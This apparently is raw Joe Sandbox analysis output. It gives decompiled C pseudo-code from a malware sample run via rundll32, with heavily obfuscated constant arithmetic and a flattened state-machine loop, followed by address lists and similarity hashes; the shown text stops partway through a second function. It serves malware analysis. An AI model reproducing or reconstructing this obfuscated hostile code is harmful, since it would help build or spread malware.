                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				signed int _v1708;
                                                                                                                      				signed int _v1712;
                                                                                                                      				signed int _v1716;
                                                                                                                      				signed int _v1720;
                                                                                                                      				signed int _v1724;
                                                                                                                      				signed int _v1728;
                                                                                                                      				signed int _v1732;
                                                                                                                      				signed int _v1736;
                                                                                                                      				signed int _v1740;
                                                                                                                      				signed int _v1744;
                                                                                                                      				signed int _v1748;
                                                                                                                      				signed int _v1752;
                                                                                                                      				signed int _v1756;
                                                                                                                      				signed int _v1760;
                                                                                                                      				signed int _v1764;
                                                                                                                      				void* _t481;
                                                                                                                      				signed int _t496;
                                                                                                                      				void* _t499;
                                                                                                                      				intOrPtr _t503;
                                                                                                                      				void* _t539;
                                                                                                                      				signed int _t550;
                                                                                                                      				signed int _t551;
                                                                                                                      				signed int _t552;
                                                                                                                      				intOrPtr _t553;
                                                                                                                      				intOrPtr* _t554;
                                                                                                                      				signed int _t555;
                                                                                                                      				signed int _t556;
                                                                                                                      				signed int _t557;
                                                                                                                      				signed int _t558;
                                                                                                                      				signed int _t559;
                                                                                                                      				signed int _t560;
                                                                                                                      				signed int _t561;
                                                                                                                      				signed int _t562;
                                                                                                                      				signed int _t563;
                                                                                                                      				signed int _t564;
                                                                                                                      				signed int _t567;
                                                                                                                      				signed int* _t568;
                                                                                                                      				void* _t572;
                                                                                                                      
                                                                                                                      				_t568 =  &_v1764;
                                                                                                                      				_v1576 = 0x9a4c1d;
                                                                                                                      				_v1596 = _v1596 & 0x00000000;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t499 = 0x9b91574;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_v1684 = 0xe59dc4;
                                                                                                                      				_v1684 = _v1684 | 0xd0a48cbc;
                                                                                                                      				_v1684 = _v1684 + 0xffff2e59;
                                                                                                                      				_v1684 = _v1684 ^ 0xd0e4cc7c;
                                                                                                                      				_v1752 = 0x51b4b3;
                                                                                                                      				_v1752 = _v1752 ^ 0x5d9a17a0;
                                                                                                                      				_t550 = 0xb;
                                                                                                                      				_t555 = 0x76;
                                                                                                                      				_v1752 = _v1752 * 0xb;
                                                                                                                      				_v1752 = _v1752 ^ 0x54bb96eb;
                                                                                                                      				_v1752 = _v1752 ^ 0x53749705;
                                                                                                                      				_v1632 = 0xaf6c30;
                                                                                                                      				_v1632 = _v1632 << 6;
                                                                                                                      				_v1632 = _v1632 ^ 0x2bdb0c02;
                                                                                                                      				_v1720 = 0x499d0c;
                                                                                                                      				_v1720 = _v1720 | 0xb1a117f5;
                                                                                                                      				_v1720 = _v1720 / _t550;
                                                                                                                      				_v1720 = _v1720 + 0x97c7;
                                                                                                                      				_v1720 = _v1720 ^ 0x102d1aad;
                                                                                                                      				_v1704 = 0xc8e3b3;
                                                                                                                      				_v1704 = _v1704 * 0x32;
                                                                                                                      				_v1704 = _v1704 ^ 0x0819b8db;
                                                                                                                      				_v1704 = _v1704 | 0x44ca091a;
                                                                                                                      				_v1704 = _v1704 ^ 0x6fefc93f;
                                                                                                                      				_v1668 = 0xa62014;
                                                                                                                      				_v1668 = _v1668 | 0xeabb5dd4;
                                                                                                                      				_v1668 = _v1668 * 0x68;
                                                                                                                      				_v1668 = _v1668 ^ 0x5dcb1e30;
                                                                                                                      				_v1744 = 0xf6f234;
                                                                                                                      				_v1744 = _v1744 * 0x2a;
                                                                                                                      				_v1744 = _v1744 ^ 0x80b741fb;
                                                                                                                      				_v1744 = _v1744 / _t555;
                                                                                                                      				_v1744 = _v1744 ^ 0x0165dd5f;
                                                                                                                      				_v1584 = 0x312e96;
                                                                                                                      				_v1584 = _v1584 + 0xffff2d5f;
                                                                                                                      				_v1584 = _v1584 ^ 0x003c0d9d;
                                                                                                                      				_v1712 = 0xa058cf;
                                                                                                                      				_v1712 = _v1712 << 0xd;
                                                                                                                      				_v1712 = _v1712 >> 8;
                                                                                                                      				_t556 = 0x70;
                                                                                                                      				_v1712 = _v1712 / _t556;
                                                                                                                      				_v1712 = _v1712 ^ 0x000e60b1;
                                                                                                                      				_v1624 = 0xe892f9;
                                                                                                                      				_v1624 = _v1624 | 0x8c579b60;
                                                                                                                      				_v1624 = _v1624 ^ 0x8cfff2b4;
                                                                                                                      				_v1616 = 0xaf548d;
                                                                                                                      				_v1616 = _v1616 << 0xe;
                                                                                                                      				_v1616 = _v1616 ^ 0xd52eab36;
                                                                                                                      				_v1732 = 0xb05ea2;
                                                                                                                      				_v1732 = _v1732 * 0x22;
                                                                                                                      				_t557 = 0x7e;
                                                                                                                      				_v1732 = _v1732 / _t557;
                                                                                                                      				_t558 = 0x6e;
                                                                                                                      				_v1732 = _v1732 / _t558;
                                                                                                                      				_v1732 = _v1732 ^ 0x000d3439;
                                                                                                                      				_v1592 = 0x913a71;
                                                                                                                      				_v1592 = _v1592 + 0xffff7440;
                                                                                                                      				_v1592 = _v1592 ^ 0x0095b07c;
                                                                                                                      				_v1696 = 0x599322;
                                                                                                                      				_v1696 = _v1696 / _t550;
                                                                                                                      				_v1696 = _v1696 ^ 0xb13d8f34;
                                                                                                                      				_v1696 = _v1696 ^ 0xb1384542;
                                                                                                                      				_v1644 = 0xa16dfa;
                                                                                                                      				_v1644 = _v1644 ^ 0xe1099bcb;
                                                                                                                      				_v1644 = _v1644 ^ 0xe1a9d34e;
                                                                                                                      				_v1648 = 0xb4e11f;
                                                                                                                      				_v1648 = _v1648 ^ 0x38d2ca48;
                                                                                                                      				_v1648 = _v1648 ^ 0x386e0f93;
                                                                                                                      				_v1608 = 0x5a22b;
                                                                                                                      				_t559 = 0x77;
                                                                                                                      				_t551 = 0x6a;
                                                                                                                      				_v1608 = _v1608 * 0x7a;
                                                                                                                      				_v1608 = _v1608 ^ 0x02a61538;
                                                                                                                      				_v1680 = 0xefbd86;
                                                                                                                      				_v1680 = _v1680 ^ 0x59656a46;
                                                                                                                      				_v1680 = _v1680 + 0xffff500f;
                                                                                                                      				_v1680 = _v1680 ^ 0x598ded80;
                                                                                                                      				_v1724 = 0x3ee43e;
                                                                                                                      				_v1724 = _v1724 + 0x7543;
                                                                                                                      				_v1724 = _v1724 ^ 0x2e29824a;
                                                                                                                      				_v1724 = _v1724 + 0xffff57f4;
                                                                                                                      				_v1724 = _v1724 ^ 0x2e1fc8aa;
                                                                                                                      				_v1580 = 0xa6d208;
                                                                                                                      				_v1580 = _v1580 | 0x568c9bfe;
                                                                                                                      				_v1580 = _v1580 ^ 0x56ae214d;
                                                                                                                      				_v1636 = 0x6d5924;
                                                                                                                      				_v1636 = _v1636 ^ 0x925c239d;
                                                                                                                      				_v1636 = _v1636 ^ 0x923215a4;
                                                                                                                      				_v1664 = 0x695adc;
                                                                                                                      				_v1664 = _v1664 / _t559;
                                                                                                                      				_v1664 = _v1664 + 0x9e91;
                                                                                                                      				_v1664 = _v1664 ^ 0x000b7b12;
                                                                                                                      				_v1728 = 0x27fcd;
                                                                                                                      				_v1728 = _v1728 << 7;
                                                                                                                      				_v1728 = _v1728 >> 0xd;
                                                                                                                      				_v1728 = _v1728 / _t551;
                                                                                                                      				_v1728 = _v1728 ^ 0x000e8750;
                                                                                                                      				_v1660 = 0x324e38;
                                                                                                                      				_t560 = 0xd;
                                                                                                                      				_v1660 = _v1660 / _t560;
                                                                                                                      				_v1660 = _v1660 ^ 0xc6795c1b;
                                                                                                                      				_v1660 = _v1660 ^ 0xc67cbc2f;
                                                                                                                      				_v1672 = 0xd5264d;
                                                                                                                      				_v1672 = _v1672 ^ 0x5df7965f;
                                                                                                                      				_v1672 = _v1672 << 0xa;
                                                                                                                      				_v1672 = _v1672 ^ 0x8ac02156;
                                                                                                                      				_v1760 = 0x48e2ee;
                                                                                                                      				_t213 =  &_v1760; // 0x48e2ee
                                                                                                                      				_t561 = 0x2d;
                                                                                                                      				_v1760 =  *_t213 / _t561;
                                                                                                                      				_v1760 = _v1760 ^ 0xd2c1db30;
                                                                                                                      				_v1760 = _v1760 ^ 0xa53e2936;
                                                                                                                      				_v1760 = _v1760 ^ 0x77fe21cd;
                                                                                                                      				_v1740 = 0xf20c88;
                                                                                                                      				_v1740 = _v1740 / _t551;
                                                                                                                      				_v1740 = _v1740 | 0xd96c60ad;
                                                                                                                      				_v1740 = _v1740 << 0xc;
                                                                                                                      				_v1740 = _v1740 ^ 0xe68a7191;
                                                                                                                      				_v1588 = 0x8e0aab;
                                                                                                                      				_t562 = 0x1b;
                                                                                                                      				_v1588 = _v1588 * 0x60;
                                                                                                                      				_v1588 = _v1588 ^ 0x354c6054;
                                                                                                                      				_v1748 = 0x4e8d34;
                                                                                                                      				_v1748 = _v1748 + 0x9e68;
                                                                                                                      				_v1748 = _v1748 ^ 0xb589d4ed;
                                                                                                                      				_v1748 = _v1748 ^ 0xb12a6144;
                                                                                                                      				_v1748 = _v1748 ^ 0x04e7453a;
                                                                                                                      				_v1756 = 0x3003da;
                                                                                                                      				_v1756 = _v1756 << 2;
                                                                                                                      				_v1756 = _v1756 + 0x3550;
                                                                                                                      				_v1756 = _v1756 + 0xffff4840;
                                                                                                                      				_v1756 = _v1756 ^ 0x00bf12fa;
                                                                                                                      				_v1764 = 0x8da8e8;
                                                                                                                      				_v1764 = _v1764 * 0x70;
                                                                                                                      				_v1764 = _v1764 | 0x3d3a45ac;
                                                                                                                      				_v1764 = _v1764 + 0xffff8f06;
                                                                                                                      				_v1764 = _v1764 ^ 0x3dfaa955;
                                                                                                                      				_v1600 = 0x16815c;
                                                                                                                      				_v1600 = _v1600 | 0x74adb72e;
                                                                                                                      				_v1600 = _v1600 ^ 0x74bac2ad;
                                                                                                                      				_v1736 = 0x173f97;
                                                                                                                      				_v1736 = _v1736 + 0x884f;
                                                                                                                      				_v1736 = _v1736 ^ 0x83e17d26;
                                                                                                                      				_v1736 = _v1736 ^ 0x7950511a;
                                                                                                                      				_v1736 = _v1736 ^ 0xfaacae3a;
                                                                                                                      				_v1640 = 0x9a0364;
                                                                                                                      				_v1640 = _v1640 >> 4;
                                                                                                                      				_v1640 = _v1640 ^ 0x000747da;
                                                                                                                      				_v1700 = 0xbe1482;
                                                                                                                      				_v1700 = _v1700 ^ 0x7ff54444;
                                                                                                                      				_v1700 = _v1700 << 4;
                                                                                                                      				_v1700 = _v1700 + 0xffff3bda;
                                                                                                                      				_v1700 = _v1700 ^ 0xf4b38ed0;
                                                                                                                      				_v1708 = 0xf0c015;
                                                                                                                      				_v1708 = _v1708 >> 2;
                                                                                                                      				_v1708 = _v1708 * 0x59;
                                                                                                                      				_v1708 = _v1708 >> 0xd;
                                                                                                                      				_v1708 = _v1708 ^ 0x00007652;
                                                                                                                      				_v1628 = 0xfcf2a2;
                                                                                                                      				_v1628 = _v1628 + 0x310b;
                                                                                                                      				_v1628 = _v1628 ^ 0x00fb84b7;
                                                                                                                      				_v1716 = 0xcaf3e1;
                                                                                                                      				_v1716 = _v1716 ^ 0x58005d51;
                                                                                                                      				_v1716 = _v1716 / _t562;
                                                                                                                      				_v1716 = _v1716 << 0xb;
                                                                                                                      				_v1716 = _v1716 ^ 0x4f02f929;
                                                                                                                      				_v1688 = 0xa9bf16;
                                                                                                                      				_t563 = 0x35;
                                                                                                                      				_v1688 = _v1688 / _t563;
                                                                                                                      				_v1688 = _v1688 * 0x4f;
                                                                                                                      				_v1688 = _v1688 ^ 0x00ffa3e1;
                                                                                                                      				_v1692 = 0x1a52e4;
                                                                                                                      				_v1692 = _v1692 | 0xd338ade8;
                                                                                                                      				_v1692 = _v1692 + 0xffff9820;
                                                                                                                      				_v1692 = _v1692 ^ 0xd337a700;
                                                                                                                      				_v1652 = 0xe154f6;
                                                                                                                      				_v1652 = _v1652 ^ 0xa48feb80;
                                                                                                                      				_v1652 = _v1652 ^ 0xa466ad28;
                                                                                                                      				_v1676 = 0x84491a;
                                                                                                                      				_v1676 = _v1676 + 0x31b5;
                                                                                                                      				_v1676 = _v1676 + 0x8487;
                                                                                                                      				_v1676 = _v1676 ^ 0x0081059f;
                                                                                                                      				_v1604 = 0xb120c5;
                                                                                                                      				_t564 = 0x4b;
                                                                                                                      				_t552 = _v1596;
                                                                                                                      				_t567 = _v1596;
                                                                                                                      				_v1604 = _v1604 * 0x65;
                                                                                                                      				_v1604 = _v1604 ^ 0x45e4f2f6;
                                                                                                                      				_v1656 = 0x2a0a41;
                                                                                                                      				_v1656 = _v1656 << 0xc;
                                                                                                                      				_t498 = _v1596;
                                                                                                                      				_v1656 = _v1656 / _t564;
                                                                                                                      				_v1656 = _v1656 ^ 0x022e7e7e;
                                                                                                                      				_v1612 = 0x774513;
                                                                                                                      				_v1612 = _v1612 | 0x207416f8;
                                                                                                                      				_v1612 = _v1612 ^ 0x207b64ec;
                                                                                                                      				_v1620 = 0x205158;
                                                                                                                      				_v1620 = _v1620 << 0xd;
                                                                                                                      				_v1620 = _v1620 ^ 0x0a275bbe;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					while(1) {
                                                                                                                      						_t539 = 0x5c;
                                                                                                                      						do {
                                                                                                                      							while(1) {
                                                                                                                      								L3:
                                                                                                                      								_t572 = _t499 - 0xa8fcf9f;
                                                                                                                      								if(_t572 > 0) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								if(_t572 == 0) {
                                                                                                                      									E00698F9E(_v1688, _v1692, _v1652, _v1676, _t567);
                                                                                                                      									_t568 =  &(_t568[3]);
                                                                                                                      									goto L19;
                                                                                                                      								} else {
                                                                                                                      									if(_t499 == 0x4b40ba0) {
                                                                                                                      										_t553 =  *0x6a3e10; // 0x0
                                                                                                                      										_t554 = _t553 + 0x1c;
                                                                                                                      										while(1) {
                                                                                                                      											__eflags =  *_t554 - _t539;
                                                                                                                      											if( *_t554 == _t539) {
                                                                                                                      												break;
                                                                                                                      											}
                                                                                                                      											_t554 = _t554 + 2;
                                                                                                                      											__eflags = _t554;
                                                                                                                      										}
                                                                                                                      										_t552 = _t554 + 2;
                                                                                                                      										_t499 = 0x9c63280;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t499 == 0x7e93d80) {
                                                                                                                      											_t567 = E00681CEC(_v1740, _t552, _t499, _t499, _t552, _v1588, _t498, _v1748, _v1756, _v1764, _v1632, _v1704, _t499, _v1600, _v1668, _v1736, _t499, _v1720, _t499, _v1640,  &_v520);
                                                                                                                      											_t568 =  &(_t568[0x13]);
                                                                                                                      											__eflags = _t567;
                                                                                                                      											if(_t567 == 0) {
                                                                                                                      												L19:
                                                                                                                      												_t499 = 0xfa48365;
                                                                                                                      												_t539 = 0x5c;
                                                                                                                      												continue;
                                                                                                                      											} else {
                                                                                                                      												_t499 = 0xacc4ac0;
                                                                                                                      												_v1596 = 1;
                                                                                                                      												while(1) {
                                                                                                                      													_t539 = 0x5c;
                                                                                                                      													goto L3;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											if(_t499 == 0x9b91574) {
                                                                                                                      												_push(_v1624);
                                                                                                                      												_push(_v1684);
                                                                                                                      												_push(_v1712);
                                                                                                                      												_push( &_v1560);
                                                                                                                      												E006946BB(_v1744, _v1584);
                                                                                                                      												_t568 = _t568 - 0xc + 0x1c;
                                                                                                                      												_t499 = 0xf66352a;
                                                                                                                      												while(1) {
                                                                                                                      													_t539 = 0x5c;
                                                                                                                      													goto L3;
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												if(_t499 != 0x9c63280) {
                                                                                                                      													goto L27;
                                                                                                                      												} else {
                                                                                                                      													_t496 = E0068912C(_v1752, _v1728, _t499, _v1660, _t499, _v1672, _v1760);
                                                                                                                      													_t498 = _t496;
                                                                                                                      													_t568 =  &(_t568[5]);
                                                                                                                      													if(_t496 != 0) {
                                                                                                                      														_t499 = 0x7e93d80;
                                                                                                                      														while(1) {
                                                                                                                      															_t539 = 0x5c;
                                                                                                                      															goto L3;
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								L24:
                                                                                                                      								return _v1596;
                                                                                                                      							}
                                                                                                                      							__eflags = _t499 - 0xacc4ac0;
                                                                                                                      							if(_t499 == 0xacc4ac0) {
                                                                                                                      								E0068D6D8(_t567, _v1708, _t498, _v1628, _v1716);
                                                                                                                      								_t568 =  &(_t568[4]);
                                                                                                                      								_t499 = 0xa8fcf9f;
                                                                                                                      								_t539 = 0x5c;
                                                                                                                      								goto L27;
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t499 - 0xf66352a;
                                                                                                                      								if(__eflags == 0) {
                                                                                                                      									_push(_v1592);
                                                                                                                      									_push(_v1732);
                                                                                                                      									_t481 = E0069DCF7(_v1616, 0x681020, __eflags);
                                                                                                                      									E0069176B( &_v1040, __eflags);
                                                                                                                      									_t503 =  *0x6a3e10; // 0x0
                                                                                                                      									_t431 = _t503 + 0x1c; // 0x1c
                                                                                                                      									_t432 = _t503 + 0x23c; // 0x23c
                                                                                                                      									E00691652(_v1644, __eflags, _t432, _t431, _v1648, _v1608, _t481, 0x104,  &_v520, _v1680,  &_v1560, _v1724,  &_v1040, _v1580);
                                                                                                                      									E0068A8B0(_v1636, _t481, _v1664);
                                                                                                                      									_t568 =  &(_t568[0xf]);
                                                                                                                      									_t499 = 0x4b40ba0;
                                                                                                                      									goto L1;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t499 - 0xfa48365;
                                                                                                                      									if(_t499 != 0xfa48365) {
                                                                                                                      										goto L27;
                                                                                                                      									} else {
                                                                                                                      										E00698F9E(_v1604, _v1656, _v1612, _v1620, _t498);
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							goto L24;
                                                                                                                      							L27:
                                                                                                                      							__eflags = _t499 - 0xd334e0e;
                                                                                                                      						} while (_t499 != 0xd334e0e);
                                                                                                                      						goto L24;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x0069624b
                                                                                                                      0x00696256
                                                                                                                      0x0069625e
                                                                                                                      0x0069626e
                                                                                                                      0x00696272
                                                                                                                      0x00696277
                                                                                                                      0x0069627f
                                                                                                                      0x0069628b
                                                                                                                      0x0069628e
                                                                                                                      0x00696297
                                                                                                                      0x0069629b
                                                                                                                      0x006962a3
                                                                                                                      0x006962ab
                                                                                                                      0x006962b5
                                                                                                                      0x006962bd
                                                                                                                      0x006962c5
                                                                                                                      0x006962d0
                                                                                                                      0x006962db
                                                                                                                      0x006962e6
                                                                                                                      0x006962ee
                                                                                                                      0x006962f6
                                                                                                                      0x006962fe
                                                                                                                      0x00696306
                                                                                                                      0x0069631b
                                                                                                                      0x0069631c
                                                                                                                      0x00696323
                                                                                                                      0x0069632a
                                                                                                                      0x00696331
                                                                                                                      0x0069633c
                                                                                                                      0x00696344
                                                                                                                      0x0069634f
                                                                                                                      0x00696356
                                                                                                                      0x0069635a
                                                                                                                      0x00696362
                                                                                                                      0x0069636d
                                                                                                                      0x00696378
                                                                                                                      0x00696383
                                                                                                                      0x0069638e
                                                                                                                      0x00696396
                                                                                                                      0x006963a1
                                                                                                                      0x006963a1
                                                                                                                      0x006963a6
                                                                                                                      0x006963a8
                                                                                                                      0x006963a9
                                                                                                                      0x006963a9
                                                                                                                      0x006963a9
                                                                                                                      0x006963a9
                                                                                                                      0x006963ab
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x006963b1
                                                                                                                      0x006964ef
                                                                                                                      0x006964f4
                                                                                                                      0x00000000
                                                                                                                      0x006963b7
                                                                                                                      0x006963bd
                                                                                                                      0x006964bb
                                                                                                                      0x006964c1
                                                                                                                      0x006964c9
                                                                                                                      0x006964c9
                                                                                                                      0x006964cc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x006964c6
                                                                                                                      0x006964c6
                                                                                                                      0x006964c6
                                                                                                                      0x006964ce
                                                                                                                      0x006964d1
                                                                                                                      0x00000000
                                                                                                                      0x006963c3
                                                                                                                      0x006963c9
                                                                                                                      0x0069649d
                                                                                                                      0x0069649f
                                                                                                                      0x006964a2
                                                                                                                      0x006964a4
                                                                                                                      0x006964f7
                                                                                                                      0x006964f7
                                                                                                                      0x006963a8
                                                                                                                      0x00000000
                                                                                                                      0x006964a6
                                                                                                                      0x006964a6
                                                                                                                      0x006964ab
                                                                                                                      0x006963a6
                                                                                                                      0x006963a8
                                                                                                                      0x00000000
                                                                                                                      0x006963a8
                                                                                                                      0x006963a6
                                                                                                                      0x006963cb
                                                                                                                      0x006963d1
                                                                                                                      0x00696411
                                                                                                                      0x0069641f
                                                                                                                      0x00696423
                                                                                                                      0x00696435
                                                                                                                      0x00696436
                                                                                                                      0x0069643b
                                                                                                                      0x0069643e
                                                                                                                      0x006963a6
                                                                                                                      0x006963a8
                                                                                                                      0x00000000
                                                                                                                      0x006963a8
                                                                                                                      0x006963d3
                                                                                                                      0x006963d9
                                                                                                                      0x00000000
                                                                                                                      0x006963df
                                                                                                                      0x006963f8
                                                                                                                      0x006963fd
                                                                                                                      0x006963ff
                                                                                                                      0x00696404
                                                                                                                      0x0069640a
                                                                                                                      0x006963a6
                                                                                                                      0x006963a8
                                                                                                                      0x00000000
                                                                                                                      0x006963a8
                                                                                                                      0x006963a6
                                                                                                                      0x00696404
                                                                                                                      0x006963d9
                                                                                                                      0x006963d1
                                                                                                                      0x006963c9
                                                                                                                      0x006963bd
                                                                                                                      0x00696546
                                                                                                                      0x00696557
                                                                                                                      0x00696557
                                                                                                                      0x00696501
                                                                                                                      0x00696507
                                                                                                                      0x00696619
                                                                                                                      0x0069661e
                                                                                                                      0x00696621
                                                                                                                      0x00696625
                                                                                                                      0x00000000
                                                                                                                      0x0069650d
                                                                                                                      0x0069650d
                                                                                                                      0x00696513
                                                                                                                      0x00696558
                                                                                                                      0x00696564
                                                                                                                      0x0069656f
                                                                                                                      0x0069657d
                                                                                                                      0x006965bd
                                                                                                                      0x006965ca
                                                                                                                      0x006965ce
                                                                                                                      0x006965dc
                                                                                                                      0x006965f1
                                                                                                                      0x006965f6
                                                                                                                      0x006965f9
                                                                                                                      0x00000000
                                                                                                                      0x00696515
                                                                                                                      0x00696515
                                                                                                                      0x0069651b
                                                                                                                      0x00000000
                                                                                                                      0x00696521
                                                                                                                      0x0069653e
                                                                                                                      0x00696543
                                                                                                                      0x0069651b
                                                                                                                      0x00696513
                                                                                                                      0x00000000
                                                                                                                      0x00696626
                                                                                                                      0x00696626
                                                                                                                      0x00696626
                                                                                                                      0x00000000
                                                                                                                      0x00696632
                                                                                                                      0x006963a6

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $Ym$94$>>$A*$Cu$FjeY$P5$Q]$Rv$T`L5$XQ $d{ $H
                                                                                                                      • API String ID: 0-2231434368
                                                                                                                      • Opcode ID: a3bdb346ddee00099ba496e25899e413b23e6f7f9ce42fe68dba9355de835d5a
                                                                                                                      • Instruction ID: 52020678311494f6f811c7c448ba99af39ed6c3dd7fcbdc53d267bb76fe324d7
                                                                                                                      • Opcode Fuzzy Hash: a3bdb346ddee00099ba496e25899e413b23e6f7f9ce42fe68dba9355de835d5a
                                                                                                                      • Instruction Fuzzy Hash: 79224271508380DFD7A8CF65C58AA9BFBE6FBC4744F10891DE29A86260D7B58849CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00696DF8(void* __ecx) {
                                                                                                                      				char _v524;
                                                                                                                      				char _v1044;
                                                                                                                      				char _v1564;
                                                                                                                      				short _v1568;
                                                                                                                      				short _v1572;
                                                                                                                      				intOrPtr _v1576;
                                                                                                                      				intOrPtr _v1580;
                                                                                                                      				intOrPtr _v1592;
                                                                                                                      				char _v1596;
                                                                                                                      				char _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				signed int _v1708;
                                                                                                                      				signed int _v1712;
                                                                                                                      				signed int _v1716;
                                                                                                                      				signed int _v1720;
                                                                                                                      				signed int _v1724;
                                                                                                                      				signed int _v1728;
                                                                                                                      				signed int _v1732;
                                                                                                                      				signed int _v1736;
                                                                                                                      				signed int _v1740;
                                                                                                                      				signed int _v1744;
                                                                                                                      				signed int _v1748;
                                                                                                                      				signed int _v1752;
                                                                                                                      				signed int _v1756;
                                                                                                                      				signed int _v1760;
                                                                                                                      				signed int _v1764;
                                                                                                                      				signed int _v1768;
                                                                                                                      				signed int _v1772;
                                                                                                                      				signed int _v1776;
                                                                                                                      				signed int _v1780;
                                                                                                                      				signed int _v1784;
                                                                                                                      				signed int _v1788;
                                                                                                                      				signed int _v1792;
                                                                                                                      				signed int _v1796;
                                                                                                                      				signed int _v1800;
                                                                                                                      				signed int _v1804;
                                                                                                                      				signed int _v1808;
                                                                                                                      				signed int _v1812;
                                                                                                                      				signed int _v1816;
                                                                                                                      				signed int _v1820;
                                                                                                                      				signed int _v1824;
                                                                                                                      				signed int _v1828;
                                                                                                                      				signed int _v1832;
                                                                                                                      				signed int _v1836;
                                                                                                                      				signed int _v1840;
                                                                                                                      				signed int _v1844;
                                                                                                                      				void* _t583;
                                                                                                                      				void* _t585;
                                                                                                                      				void* _t592;
                                                                                                                      				void* _t603;
                                                                                                                      				void* _t606;
                                                                                                                      				void* _t609;
                                                                                                                      				signed int _t611;
                                                                                                                      				signed int _t612;
                                                                                                                      				signed int _t613;
                                                                                                                      				signed int _t614;
                                                                                                                      				signed int _t615;
                                                                                                                      				signed int _t616;
                                                                                                                      				signed int _t617;
                                                                                                                      				signed int _t618;
                                                                                                                      				signed int _t619;
                                                                                                                      				void* _t620;
                                                                                                                      				signed int _t674;
                                                                                                                      				char _t675;
                                                                                                                      				void* _t677;
                                                                                                                      				signed int* _t682;
                                                                                                                      
                                                                                                                      				_t682 =  &_v1844;
                                                                                                                      				_v1580 = 0x812dcc;
                                                                                                                      				_v1600 = 0;
                                                                                                                      				_v1572 = 0;
                                                                                                                      				_v1568 = 0;
                                                                                                                      				_v1576 = 0x4b1be1;
                                                                                                                      				_v1604 = 0xb0e9fc;
                                                                                                                      				_v1604 = _v1604 >> 0xe;
                                                                                                                      				_v1604 = _v1604 ^ 0x020002c3;
                                                                                                                      				_v1816 = 0x316963;
                                                                                                                      				_v1816 = _v1816 ^ 0x05c37e76;
                                                                                                                      				_v1816 = _v1816 * 0x44;
                                                                                                                      				_t609 = __ecx;
                                                                                                                      				_v1816 = _v1816 << 6;
                                                                                                                      				_t677 = 0xb42e112;
                                                                                                                      				_v1816 = _v1816 ^ 0x13878f70;
                                                                                                                      				_v1648 = 0xe65aa1;
                                                                                                                      				_v1648 = _v1648 + 0xffffb7c7;
                                                                                                                      				_v1648 = _v1648 ^ 0x00e866e0;
                                                                                                                      				_v1608 = 0x4e6d43;
                                                                                                                      				_v1608 = _v1608 << 3;
                                                                                                                      				_v1608 = _v1608 ^ 0x027e4d7c;
                                                                                                                      				_v1792 = 0x62c447;
                                                                                                                      				_v1792 = _v1792 + 0xfffff9b0;
                                                                                                                      				_v1792 = _v1792 + 0xffff1ab6;
                                                                                                                      				_v1792 = _v1792 ^ 0x5826ec20;
                                                                                                                      				_v1792 = _v1792 ^ 0x58465e47;
                                                                                                                      				_v1616 = 0xd881ce;
                                                                                                                      				_t611 = 0x1c;
                                                                                                                      				_v1616 = _v1616 / _t611;
                                                                                                                      				_v1616 = _v1616 ^ 0x00049a8c;
                                                                                                                      				_v1784 = 0x225701;
                                                                                                                      				_v1784 = _v1784 ^ 0x455f73cc;
                                                                                                                      				_v1784 = _v1784 + 0x2d0b;
                                                                                                                      				_v1784 = _v1784 + 0xffff7069;
                                                                                                                      				_v1784 = _v1784 ^ 0x457ed570;
                                                                                                                      				_v1656 = 0xa0746c;
                                                                                                                      				_v1656 = _v1656 << 5;
                                                                                                                      				_v1656 = _v1656 ^ 0x1405cb88;
                                                                                                                      				_v1756 = 0x86f3a;
                                                                                                                      				_v1756 = _v1756 << 0xf;
                                                                                                                      				_v1756 = _v1756 + 0xffff9aa0;
                                                                                                                      				_v1756 = _v1756 ^ 0x379e88f8;
                                                                                                                      				_v1840 = 0x372205;
